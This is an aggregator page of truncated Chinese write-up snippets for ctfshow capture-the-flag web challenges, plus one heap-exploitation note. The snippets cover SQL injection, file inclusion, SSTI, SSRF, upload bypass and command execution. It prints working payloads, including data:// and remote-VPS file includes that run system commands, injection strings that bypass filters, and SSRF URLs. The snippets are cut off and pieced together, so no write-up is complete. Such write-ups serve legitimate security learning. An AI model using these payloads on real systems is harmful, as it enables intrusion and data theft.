ICode9

web201 今天搞点轻松的，昨天晚上失眠了 基础命令 命令：python sqlmap.py xxxxxxx -u 指定注入点 –dbs 跑库名 –tables 跑表名 –columns 跑字段名 –dump 枚举数据 -D 指定库 -T 指定表 -C指定字段 –random-agent 每次访问切换请求头 防ban –delay=1 每次探测延时一秒 防ba

打开后就是好长的源码，一块一块分析 第一块   匹配不是0-9数字或者不是小数点、减号的内容。反转的数要和本来的值相等，并且不能是回文。 因为intval的特性,level1就有很多方法绕过了 -0, 0- , 1.10 , 0. , .0 ,0.00 要求$md5==md5(md5($md5))根据php弱类型比较的漏洞，直接跑脚本

打开源代码 按规定输入后看到真正的源码 是要通过通配符和POST提交 根据网上wp的教程，通过POST提交修改这几行，可以得到flag POST /?cmd=?><?=`.+/??p/p?p??????`; HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888

SSTI 面板注入！ 先补充一波基本知识！ //获取基本类 ''.__class__.__mro__[1] {}.__class__.__bases__[0] ().__class__.__bases__[0] [].__class__.__bases__[0] object //读文件 ().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read() object.__subclasses__

文件包含 第七十八题 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 利用data协议执行系统命令 data://text/plain,<?php system('cat flag.php');?> 查看源码获得flag,此处不能直接包含flag.ph

文件上传 第一百五十一题 前端验证图片是否为png格式 上传png格式文件,burp捉包改为php 第一百五十二题 增加了后端MIME类型验证,客户端可控 操作同上 第一百五十三题 上传.user.ini文件覆盖php.ini文件配置 贴上官方解释: 自PHP5.3.0起,PHP支持基于每个目录的INI文件配置,如

命令执行 第二十九题 提示信息：命令执行，需要严格的过滤 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 查看源码，传入c参数。 ?c=echo `tac fl''ag.php`

web78 ?file=data://text/plain,<?php system("cat flag.php");?> web 79 ?file=data://text/plain,<?= system("cat flag*");?> web80 hao 方法一：远程文件包含 往VPS下面写马，然后远程包含： ?file=http://118.***.***.***/1.txt 方法二：日志文件包含 ?file=/var/log/n

根据题目是sql注入所以直接抓包打开，用万能密码验证登陆成功 判断字段 三个字段，接下来爆库名 爆表名 爆字段名 最后爆flag值

web45 关于黑洞的传送门 传送门1 传送门2 preg_match函数多了对空格的过滤 空格可以用${IFS}和%0a代替绕过过滤 常规的后面一个变量写入黑洞，直接构造payload： http://9e400eba-95d3-409c-b50a-451ff5a2d4a2.challenge.ctf.show:8080/?c=ls%26%26ls 用${IFS}代替空格，构造pay

Web6 使用admin' or 1=1# 出现sql inject error的字样 说明有些字符被拦截了 每个字符挨个尝试后 发现是空格(%20)被拦截了 空格被拦截的话可以尝试/**/来代替空格一下就是完整的sql注入 从爆库到爆出字段值 admin'/**/union/**/select/**/1,database()admin'/**/union/**/select/

文章目录 前言web486web487web488web489web490web491web492web493web494web495web496web497web498web499web500web501web502web503web504web505web506web507web508web509web510web511web512web513web515web516 前言 前段时间写了个Web安全的Github仓库，大佬们帮忙点个小星

~目录~ 信息搜集web1 源码web2 js前台拦截web3 响应头web4 robots.txtweb5 index.phpsweb6 www.zipweb7 .gitweb8 .svnweb9 vim缓存web10 cookieweb11 域名解析web12 公开信息web13 技术文档敏感信息web14 editorweb15 邮箱web16 php探针web17 查真实ipweb18 jsweb19 密钥

web486 扫描后台发现flag.php，根据url发现存在文件包含，templates/xxx.php 所以只需要action=…/flag即可 payload： index.php?action=../flag web487 通过action=…/index得到sql语句 $sql = "select id from user where username = md5('$username') and password=md5('$passw

文章目录 web351web352web353web354302跳转其他方法 web355web356web357DNS重绑定 web358 web351 payload:url=http://127.0.0.1/flag.php web352 源码 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme

ctfshow SSRF简介危害web351web352parse_url web353更改IP地址写法 web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介 服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器

序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function check

文章目录 说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-43

web11 我们来做一下web11，打开环境，    这次直接把源码给了出来。这段源码还是比较容易的。大家看这个 $_SESSION ，条件是让password=session['password']才能显示flag 什么是session呢。 Session是另一种记录客户状态的机制，它是在服务器上面，客户端浏览器访问服务器的时候，服务器

web 9 首先把环境下载下来，然后，界面是这样子      给了你用户名了，没有密码，惯性思维使我认为是sql注入，那我就试着做了一下，可是都没有回显，不知道是啥问题。或许是过滤了？还是怎么样。反正就是回显不了。 那我就扫描一下目录吧，拿出我们的dirsearch扫它一手： python dirsearch.py -u

web21 打开网站弹出登录窗口 用burpsuite抓包   网站采用的是Basic认证，详细参考https://www.cnblogs.com/rinack/p/7595232.html  输入的用户名和密码以base64的形式传输 使用burpsuite的intruder功能 payloads选择Cutom iterator position1       position2 使用本题提

因为太菜了，所以更新比较慢，会慢慢边复现边写wp，flag打码是想让看我博客的小伙伴们能够自己独立复现一遍而不是照抄flag，有错误的地方还请师傅们不吝指教 目录 杂项签到misc2miscxmisc50misc30 杂项签到 用ZipCenOp.jar可以解zip压缩包伪加密 ┌──(root

可以事先看一下这篇文章方便做题 命令执行小技巧 Web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)) { eval($c); } }else{ highlight_file(__FILE__); 一.分析代码： if(!

big_family 看了别人很久的wp，有两种方：一种是fsop、另一种是直接将top chunk给分配到malloc_hook上 top chunk给分配到malloc_hook思路 首先分配若干个fast bin，在释放，由于堆的机制，当申请了一个属于small bin大小时，就会造成fastbin的合并 合并后就已经可以leak libc了，在由于释放的

文章目录 web380web381web382、383web384web385web386web387388web389web390web391web392web393 web380 payload 后台目录扫描发现page.php，什么，没有扫到，那就自己添加到扫描器的字典里吧。 page.php?id=flag web381 payload 地址在源码里面 web382、383 还是上面的地址